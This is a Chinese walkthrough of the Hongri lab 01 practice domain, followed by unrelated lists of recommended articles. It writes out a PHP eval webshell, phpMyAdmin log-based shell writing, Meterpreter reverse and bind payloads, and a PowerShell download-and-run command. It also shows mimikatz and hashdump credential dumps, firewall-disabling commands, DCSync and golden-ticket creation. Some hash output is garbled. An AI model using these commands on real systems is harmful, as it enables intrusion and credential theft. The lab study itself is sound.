红日靶场01

O、 环境搭建

拓扑图

kali     192.168.150.128
vm1     192.168.52.143  192.168.150.152
vm2     192.168.52.141
vm3(域控)     192.168.52.138

可以参考 红日靶场配置

一、 vm1

1. 信息收集

0. phpStudy 探针

1. 端口扫描

nmap 192.168.150.152 -sT -Pn

80 web服务

2. 目录扫描

dirsearch.py

发现phpmyadmin

此处存在 弱口令 root root ，可尝试写马

不知道为什么用 BP 爆破root的返回包和错误密码结果一样

此处还有其实 beifen.rar 奈何信息收集能力太弱

访问http://192.168.150.152/beifen.rar

下载网站备份

3. 网站源码寻找信息

网站路径一清二楚码

访问验证,存在，点击登录

根据源码显示，访问后台

寻找数据库文件(找账号密码)

发现配置文件

1)进后台方法一

在网站首页的公告存在默认账号密码

进入后台

2）进后台方法二(失败)

发现可疑账号密码

寻找后台登录函数，密码加密函数

好像不可逆qwq

4. getshell

方法一：后台模板插马

百度搜索yxcms相关漏洞

插入一句话木马

<?php @eval($_POST['cmd']);?>

菜刀连接

方法二：phpmyadmin

1. outfile

找绝对路径

查看数据库路径

show global variables like "%datadir%";

C:\phpStudy\MySQL\data\

在浏览器查看路径时发现含有绝对路径报错

select '<?php @eval($_POST[1])?>' into outfile 'C:\phpStudy\WWW\yxcms\web.php'

--secure-file-priv选项无法写入

2. 日志写马

select user();

查看日志配置

show variables like 'general%';

来到变量处，修改general log 和 general log file 的值

set global general_log="ON";
set global general_log_file="C:/phpStudy/WWW/shell.php"

配置修改成功

一句话木马会被记录在日志中，从而getshell

select "<?php @eval($_POST['cmd']);?>";

5. 建立msf会话

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.150.128 lport=2223 -f exe > /root/shell.exe

上传

运行 shell.exe

成功建立

6. 爆破hash

迁移进程 migrate

加载 mimikatz, load mimikatz

load kiwi

creds_all 列举所有凭据

creds_kerberos 列举所有kerberos凭据

meterpreter > creds_kerberos
[+] Running as SYSTEM
[*] Retrieving kerberos credentials
kerberos credentials
====================Username       Domain   Password
--------       ------   --------
(null)         (null)   (null)
Administrator  GOD.ORG  !@#QWE123
stu1$          GOD.ORG  d1 28 eb 7d 4e 3d a9 f9 45 1d dd b8 11 4f ac 62 e0 72 bd fc e7 9d 31 e6 c5 d1 3f 97 f8 47 ca ed 31 85 02 17 b4 58 52 be 3e 73 72 fd cf 8b af 9c 15 7c 92 7a 3d dc 1c fd 24 8f 50 aa 3a ed ce 58 8f 39 8a a9 4e 67 68 0c c3 f8 b1 ae 91 45 83 07 be 30 e7 45 5c 68 54 fa 28 5a 8c da 54 5e 44 a7 57 ee bf 83 55 fd 6a cd 74 f6 d7 f9 4f 7a 37 1c 25 31 bd f0 0f ca 09 13 e7 56 5c 14 7c f8 03 25 03 49 93 d0 06 ea 47 4c 06 f2 d3 4a 48 46 c2 75 3f 79 08 64 a1 7c 23 f6 7b 81 1f e2 91 20 97 1a a6 b3 b0 3c c9 f5 62 9c 05 47 9a aa a3 0d 44 57 7e 0f 22 6f a7 f6 56 3f ea 21 00 7e 19 87 e1 57 9d 37 c0 f8 96 60 25 c1 f3 b9 ce 9b 8c 5f de 90 61 1c 3b f7 2a d5 1d 81 cc 98 95 60 73 a0 fe be ba a4 17 4e bf e7 5b 26 2b 06 61 9a b7 8e a9 e7

存在域GOD.ORG

Administrator !@#QWE123

上传mimikatz

kerberos::list

mimikatz # kerberos::list

[00000000] - 0x00000017 - rc4_hmac_nt
Start/End/MaxRenew: 2021/9/29 17:27:43 ; 2021/9/30 3:09:40 ; 2021/10/6 17:09:40
Server Name : krbtgt/GOD.ORG @ GOD.ORG
Client Name : stu1$ @ GOD.ORG
Flags 60a00000 : pre_authent ; renewable ; forwarded ; forwardable ;

[00000001] - 0x00000017 - rc4_hmac_nt
Start/End/MaxRenew: 2021/9/29 17:09:40 ; 2021/9/30 3:09:40 ; 2021/10/6 17:09:40
Server Name : krbtgt/GOD.ORG @ GOD.ORG
Client Name : stu1$ @ GOD.ORG
Flags 40e00000 : pre_authent ; initial ; renewable ; forwardable ;

[00000002] - 0x00000012 - aes256_hmac
Start/End/MaxRenew: 2021/9/29 17:20:17 ; 2021/9/30 3:09:40 ; 2021/10/6 17:09:40
Server Name : cifs/owa.god.org @ GOD.ORG
Client Name : stu1$ @ GOD.ORG
Flags 40a40000 : ok_as_delegate ; pre_authent ; renewable ; forwardable ;

[00000003] - 0x00000012 - aes256_hmac
Start/End/MaxRenew: 2021/9/29 17:09:40 ; 2021/9/30 3:09:40 ; 2021/10/6 17:09:40
Server Name : ldap/owa.god.org/god.org @ GOD.ORG
Client Name : stu1$ @ GOD.ORG
Flags 40a40000 : ok_as_delegate ; pre_authent ; renewable ; forwardable ;

[00000004] - 0x00000012 - aes256_hmac
Start/End/MaxRenew: 2021/9/27 20:13:31 ; 2021/9/28 6:03:09 ; 2021/10/4 20:03:09
Server Name : ldap/owa.god.org @ GOD.ORG
Client Name : stu1$ @ GOD.ORG
Flags 40a40000 : ok_as_delegate ; pre_authent ; renewable ; forwardable ;

[00000005] - 0x00000012 - aes256_hmac
Start/End/MaxRenew: 2021/9/27 20:03:16 ; 2021/9/28 6:03:09 ; 2021/10/4 20:03:09
Server Name : STU1$ @ GOD.ORG
Client Name : stu1$ @ GOD.ORG
Flags 40a00000 : pre_authent ; renewable ; forwardable ;

sid

C:\Windows\system32>whoami/user
whoami/user
================= =============================================
god\administrator S-1-5-21-2952760202-1353902439-2381784089-500

7. 远程桌面连接

run post/windows/manage/enable_rdp

rdesktop 192.168.150.152

进去 关闭防火墙 和 defender

二、 收集域内信息

1. 建立路由,配置代理

建立路由

run autoroute -s 192.168.52.0

查看

run autoroute -p

配置代理

修改 配置文件proxychains4.conf

坑：

└─# proxychains nmap 192.168.52.143 -sT 134 ⨯
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.14
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-29 10:30 CST
nmap: netutil.cc:1319: int collect_dnet_interfaces(const intf_entry*, void*): Assertion `rc == 0’ failed.
zsh: abort proxychains nmap 192.168.52.143 -sT

解决方法：

在 proxychains4.conf 中关闭dns代理

即 在proxydns 前加#

2. 内网扫描

0）收集跳板机信息

查看安装应用

run post/windows/gather/enum_applications

列举当前登陆过的用户

 run post/windows/gather/enum_logged_on_users

定位域控

run post/windows/gather/enum_domain

域内所有机器

run post/windows/gather/enum_ad_computers

​

1）主机探活

use auxiliary/scanner/netbios/nbname
set rhosts 192.168.52.0/24
set threads 30
run

可以在shell中用 ping扫描探测主机存活

for /l %i in (1,1,255) do @ping 192.168.52.%i -w 1 -n 1|find /i "ttl="

proxychains nbtscan -r 192.168.52.0/24

进入shell查看域控主机

nltest /dsgetdc:GOD

VM2: 192.168.52.143

DC: 192.168.52.141

3. 端口扫描

proxychains nmap 192.168.52.143 -sT -Pn

psexec.exe \\192.168.52.141 -u god\administrator -p !@#QWE123 cmd

4. 脚本扫描

可在 win7 的远程桌面执行
扫描是否存在常规漏洞

nmap --script==vuln 192.168.52.138

三、兰德里的折磨（失败的尝试）

1. 永恒之蓝

auxiliary/scanner/smb/smb_ms17_010

淦淦看

exploit/windows/smb/ms17_010_eternalblue

只设置rhosts，run：

Exploit completed, but no session was created.

设置 SMBDomain, SMBUser , SMBpass

Exploit completed, but no session was created.

还把session Died了

嗯…热带风味

利用 ms17_010_command 关闭防火墙

尝试 exploit/windows/smb/ms17_010_psexec

Exploit completed, but no session was created

session Died + 1

MS08-067 失败

scanner/smb/smb_login)

设置 SMBDomain, SMBUser , SMBpass

Exploit completed, but no session was created.

windows/dcerpc/ms03_026_dcom 失败

2. 域hash传递攻击

上传pexec.exe 到win7

psexec.exe \\192.168.52.141 -u god\administrator -p !@#QWE123 cmd

报错记得开启(需要重启)

exploit/windows/smb/ms17_010_psexec

添加rhosts ，run

Exploit completed, but no session was created.

设置 SMBDomain, SMBUser , SMBpass

Exploit completed, but no session was created.

session Died + 1

四、 苦尽甘来

发现 ms17_010_command 能成功执行

1. 远程桌面连接

关闭防火墙

netsh firewall set opmode disable"

防火墙添加规则 开放3389（可跳过这一步直接开启远程桌面）

netsh advfirewall firewall add rule name="Open 3389" dir=in action=allow protocol=TCP localport=3389

尝试关闭防火墙或添加规则，(有时候)Died

开启远程桌面连接

wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1

set command wmic RDTOGGLE WHERE ServerName=\'%COMPUTERNAME%\' call SetAllowTSConnections 1
//设置时特殊字符需要转义

2. 传马建立MSF连接

在win7中上传正向马到网站目录下

msfvenom -p windows/meterpreter/bind_tcp lport=13777 -f exe > /root/d.exe

利用ms17_010_command 的远程命令执行漏洞

尝试 用cmd命令下载 d.exe (特殊字符需要转义)

powershell (new-object Net.WebClient).DownloadFile(\'http://192.168.52.143/yxcms/d.exe\',\'C:\\1.exe\')

正向连接

cmd 运行 木马

成功连接

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e7114141b0337bdce1aedf5594706205:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:58e91a5ac358d86513ab224312314061:::
liukaifeng01:1000:aad3b435b51404eeaad3b435b51404ee:e7114141b0337bdce1aedf5594706205:::
ligang:1106:aad3b435b51404eeaad3b435b51404ee:1e3d22f88dfd250c9312d21686c60f41:::
OWA : 1001 : a a d 3 b 435 b 51404 e e a a d 3 b 435 b 51404 e e : 10 a d 10 a b 6 e 0 b 77 f e 984 d 8 c 26 c 24 d a f 99 : : : R O O T − T V I 862 U B E H :1001:aad3b435b51404eeaad3b435b51404ee:10ad10ab6e0b77fe984d8c26c24daf99::: ROOT-TVI862UBEH :1001:aad3b435b51404eeaad3b435b51404ee:10ad10ab6e0b77fe984d8c26c24daf99:::ROOT−TVI862UBEH:1104:aad3b435b51404eeaad3b435b51404ee:ba204b87ef6afa59677cb033b7f9e98f:::
STU1 : 1105 : a a d 3 b 435 b 51404 e e a a d 3 b 435 b 51404 e e : c 277 d c 0 a 07323 b e e 138 f b 6 c 5 c 859 b 823 : : : D E V 1 :1105:aad3b435b51404eeaad3b435b51404ee:c277dc0a07323bee138fb6c5c859b823::: DEV1 :1105:aad3b435b51404eeaad3b435b51404ee:c277dc0a07323bee138fb6c5c859b823:::DEV1:1107:aad3b435b51404eeaad3b435b51404ee:bed18e5b9d13bb384a3041a10d43c01b:::

五、 制作黄金票据

黄金票据的条件要求：
1.域名称 hacker.com
2.域的SID 值 S-1-5-21-1854149318-4101476522-1845767379
3.域的KRBTGT账户NTLM密码哈希或者aes-256值
0028977ae726d766b150520dc63df9b4
4.伪造用户名 administrator

进入dc 会话

迁移进程 加载mimikatz、 kiwi

窃取管理员权限

steal_token pid

执行命令获取制作黄金票据所需信息(sys权限无法执行改命令)

dcsync_ntlm krbtgt

meterpreter > dcsync_ntlm krbtgt
[+] Account : krbtgt
[+] NTLM Hash : 58e91a5ac358d86513ab224312314061
[+] LM Hash : a151f0fbafab56da67864278a60a75e8
[+] SID : S-1-5-21-2952760202-1353902439-2381784089-502
[+] RID : 502

在 dc 会话中制作黄金票据

golden_ticket_create -d god.org -u gui -s S-1-5-21-2952760202-1353902439-2381784089 -k 58e91a5ac358d86513ab224312314061 -t /home/kali/Desktop/hongri.ticket

进入win7会话

win7 无法访问 dc

在sessions 中加载黄金票据

kerberos_ticket_use /home/kali/Desktop/hongri.ticket

进入 shell 再次访问

进入win7会话

win7 无法访问 dc

在sessions 中加载黄金票据

kerberos_ticket_use /home/kali/Desktop/hongri.ticket

进入 shell 再次访问

《关于我不自量力挑战红日靶场01却被虐的不成人样的那档事》相关推荐

1. ComeFuture英伽学院——2020年 全国大学生英语竞赛【C类初赛真题解析】(持续更新)

   视频:ComeFuture英伽学院--2019年 全国大学生英语竞赛[C类初赛真题解析]大小作文--详细解析 课件:[课件]2019年大学生英语竞赛C类初赛.pdf 视频:2020年全国大学生英语竞赛 ...

2. ComeFuture英伽学院——2019年 全国大学生英语竞赛【C类初赛真题解析】大小作文——详细解析

   视频:ComeFuture英伽学院--2019年 全国大学生英语竞赛[C类初赛真题解析]大小作文--详细解析 课件:[课件]2019年大学生英语竞赛C类初赛.pdf 视频:2020年全国大学生英语竞赛 ...

3. 信息学奥赛真题解析（玩具谜题）

   玩具谜题(2016年信息学奥赛提高组真题) 题目描述 小南有一套可爱的玩具小人, 它们各有不同的职业.有一天, 这些玩具小人把小南的眼镜藏了起来.小南发现玩具小人们围成了一个圈,它们有的面朝圈内,有的 ...

4. 信息学奥赛之初赛 第1轮 讲解（01-08课）

   信息学奥赛之初赛讲解 01 计算机概述 系统基本结构 信息学奥赛之初赛讲解 01 计算机概述 系统基本结构_哔哩哔哩_bilibili 信息学奥赛之初赛讲解 02 软件系统 计算机语言 进制转换 信息 ...

5. 信息学奥赛一本通习题答案（五）

   最近在给小学生做C++的入门培训,用的教程是信息学奥赛一本通,刷题网址 http://ybt.ssoier.cn:8088/index.php 现将部分习题的答案放在博客上,希望能给其他有需要的人带来 ...

6. 信息学奥赛一本通习题答案（三）

   最近在给小学生做C++的入门培训,用的教程是信息学奥赛一本通,刷题网址 http://ybt.ssoier.cn:8088/index.php 现将部分习题的答案放在博客上,希望能给其他有需要的人带来 ...

7. 信息学奥赛一本通 提高篇 第六部分 数学基础 相关的真题

   第1章   快速幂 1875:[13NOIP提高组]转圈游戏 信息学奥赛一本通(C++版)在线评测系统 第2 章  素数 第 3 章  约数 第 4 章  同余问题 第 5 章  矩阵乘法 第 6 章 ...

8. 信息学奥赛一本通题目代码（非题库）

   为了完善自己学c++,很多人都去读相关文献,就比如<信息学奥赛一本通>,可又对题目无从下手,从今天开始,我将把书上的题目一 一的解析下来,可以做参考,如果有错,可以告诉我,将在下次解析里重 ...

9. 信息学奥赛一本通（C++版） 刷题 记录

   总目录详见:https://blog.csdn.net/mrcrack/article/details/86501716 信息学奥赛一本通(C++版) 刷题 记录 http://ybt.ssoier. ...

10. 最近公共祖先三种算法详解 + 模板题 建议新手收藏 例题： 信息学奥赛一本通 祖孙询问 距离

    首先什么是最近公共祖先?? 如图:红色节点的祖先为红色的1, 2, 3. 绿色节点的祖先为绿色的1, 2, 3, 4. 他们的最近公共祖先即他们最先相交的地方,如在上图中黄色的点就是他们的最近公共祖先 ...

最新文章

1. 对C语言 static作用——修饰 变量（全局变量/局部变量）、函数
2. shell下输出字体颜色
3. 单路电压表c语言编程,用AT89C51单片机制作的数字电压表
4. action无法传参数给html页面,HTML 解决form表单提交时，action url中参数无效问题
5. Visual Studio Code 1.51 发布
6. 使用dos下的命令行，也可以完成wifi连接。
7. Framework7——基础工具类
8. 【电路仿真】基于simulink全数字锁相环设计【含Matlab源码 340期】
9. 【dsp】基于dsp28335的称重系统设计
10. Delphi Android menu,Delphi菜单组件TMainMenu使用方法详解
11. matlab 科研绘图
12. JAVA数独解题（一）：框架搭建
13. 明日之后八级房怎么造？明日之后好看的八级房蓝图造型汇总
14. 变分推断 python_变分推断（Variational Inference）
15. C语言：判断一个数是否为素数
16. 求解，某M1水卡数据计算分析/大神们求指导！
17. 184页10万字智慧城市公共服务中台：业务和数据中台建设方案
18. 摩尔斯电码转换python编码_python转换字符串为摩尔斯电码的方法
19. Linux：乌班图安装jdk
20. 一文看懂区块链技术安全，在安全行业区块链又有什么用

热门文章

1. [安全科普]SSRF攻击实例解析
2. 和为S的连续正数序列(数学技巧，事半功倍)
3. 非递归实现先序遍历和中序遍历
4. 拼多多2020学霸批数据分析师笔试 —— SQL整理（2019.7.28）
5. Linux shell脚本中if的“-e，-d，-f” 说明
6. java代码画樱花飘落_一行代码引入博客园樱花飘落特效
7. Continuum robot（Concentric tube robotConstant curvature robot)分析笔记
8. vim 的特别有用的命令
9. c语言低通滤波程序,一阶低通滤波器c语言
10. 练习四级英语听力推荐用哪个APP？